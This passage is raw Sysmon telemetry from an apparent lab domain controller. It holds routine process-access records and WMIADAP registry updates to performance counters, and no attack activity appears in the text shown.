15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D62-5FA1-7301-000000008801}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.538{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7D62-5FA1-7301-000000008801}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:14.539{D28789B6-7D62-5FA1-7301-000000008801}4500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 12241200x80000000000000006709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 13241300x80000000000000006708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List25380 25386 25396 25406 25426 25470 25480 25518 25524 25540 13241300x80000000000000006707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First HelpDWORD (0x00006325) 13241300x80000000000000006706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First CounterDWORD (0x00006324) 13241300x80000000000000006705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last HelpDWORD (0x000063cb) 13241300x80000000000000006704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last CounterDWORD (0x000063ca) 13241300x80000000000000006703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x000063cb) 13241300x80000000000000006702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.726{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x000063ca) 13241300x80000000000000006701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 13241300x80000000000000006700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\PerfIniFileWmiApRpl.ini 12241200x80000000000000006699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating 12241200x80000000000000006698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Object List 12241200x80000000000000006697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Help 12241200x80000000000000006696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Help 12241200x80000000000000006695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\Last Counter 12241200x80000000000000006694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashDeleteValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\System\CurrentControlSet\Services\WmiApRpl\Performance\First Counter 13241300x80000000000000006693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last HelpDWORD (0x00006323) 13241300x80000000000000006692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.632{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last CounterDWORD (0x00006322) 13241300x80000000000000006691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2020-11-03 15:55:15.617{D28789B6-7D55-5FA1-6E01-000000008801}3364\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\UpdatingWmiApRpl 10341000x80000000000000006690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.367{D28789B6-7D63-5FA1-7401-000000008801}26121056C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7D63-5FA1-7401-000000008801}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:55:15.210{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7D63-5FA1-7401-000000008801}2612C:\Program 